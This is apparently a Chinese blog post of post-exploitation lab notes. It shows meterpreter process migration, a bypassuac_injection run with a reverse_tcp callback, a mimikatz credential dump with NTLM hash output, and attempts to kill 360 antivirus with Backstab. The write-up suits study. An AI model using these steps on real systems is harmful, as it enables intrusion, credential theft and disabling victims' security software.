Post Pentest 101

记录一些后渗透的操作
10/69的马过一周变20/68了,今天丢虚拟机直接报毒,看来免杀上还得多学学

获得了meterpreter会话之后的操作

1
2
3
4
5
6
ps | grep 360
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1104 1672 360Tray.exe x86 1
6272 1104 360Safe.exe x86 1
6380 6272 360leakfixer.exe x86 1
1
2
3
4
5
6
ps | grep Hips
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1152 188 HipsTray.exe x86 1
5268 6172 HipsMain.exe x86 1 DESKTOP-653VJP2\Kira C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsMain.exe
5444 624 HipsDaemon.exe

将进程迁移到资源浏览器中

1
2
3
ps | grep explorer
3936 4916 explorer.exe x64 1 DESKTOP-653VJP2\Kira C:\Windows\explorer.exe
migrate 3936

这里有一点需要注意,如果meterpreter在bypassuac之后获得了高权限,但是继续向低权限的进程迁移的话,会被降权

使用bypassuac获得Administrator的权限(火绒稳定拦,确切来说是直接把上传的程序给删了,360有时候会拦)

1
2
3
4
5
6
7
use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.103
set LPORT 9876
set target 1
set session 3
run

因为系统版本问题,不能用"bypassuac",只能用"bypassuac_injection",所以会莫名其妙地触发了个"SQL Client Configuration Utility EXE"的UAC,然后导致了MSF那边收不到session
另一台电脑上试的时候用的是"bypassuac",倒没问题

这里需要注意一点
target参数需要与目标机器上的操作系统相对应

1
2
3
4
5
6
7
8
show target

Exploit targets:

Id Name
-- ----
0 Windows x86
1 Windows x64

使用mimikatz模块导出Hash

1
2
3
use kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords

得到Hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Authentication Id : 0 ; 396268 (00000000:00060bec)
Session : Interactive from 1
User Name : Kira
Domain : DESKTOP-653VJP2
Logon Server : DESKTOP-653VJP2
Logon Time : 2021/8/22 17:27:49
SID : S-1-5-21-413531007-3663720574-771213360-1001
msv :
[00000003] Primary
* Username : Kira
* Domain : DESKTOP-653VJP2
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
wdigest :
* Username : Kira
* Domain : DESKTOP-653VJP2
* Password : (null)
kerberos :
* Username : Kira
* Domain : DESKTOP-653VJP2
* Password : (null)
ssp :
credman :

NTLM的加密算法为MD4,爆破起来不算复杂
这里密码是123456
拿了密码基本就可以rdp登入上去操作(关杀软)

管理员权限下taskkill只能关掉360Safe,不能关掉360Tray与ZhuDongFangYu

之后可以使用backstab来干掉"ZhuDongFangYu.exe"进程
在新装的虚拟机上运行提示缺少下面两个dll
VCRUNTIME140D.dll
ucrtbased.dll
64位系统上,64位dll路径为"C:\Windows\System32",32位dll路径为"C:\Windows\SysWOW64"
如果实战跑不了这玩意,估计得用screenshot看看是什么情况

拿这玩意杀不掉360Tray,反而一个开始占CPU一个开始占内存
估计是360在竞争生成进程,Backstab没有做内存释放的机制
最后导致虚拟机卡死
明天换台机器试试


公司机器上开虚拟机关360主程序的时候360Tray会自动退出,然后就能干"ZhuDongFangYu.exe"
就很玄学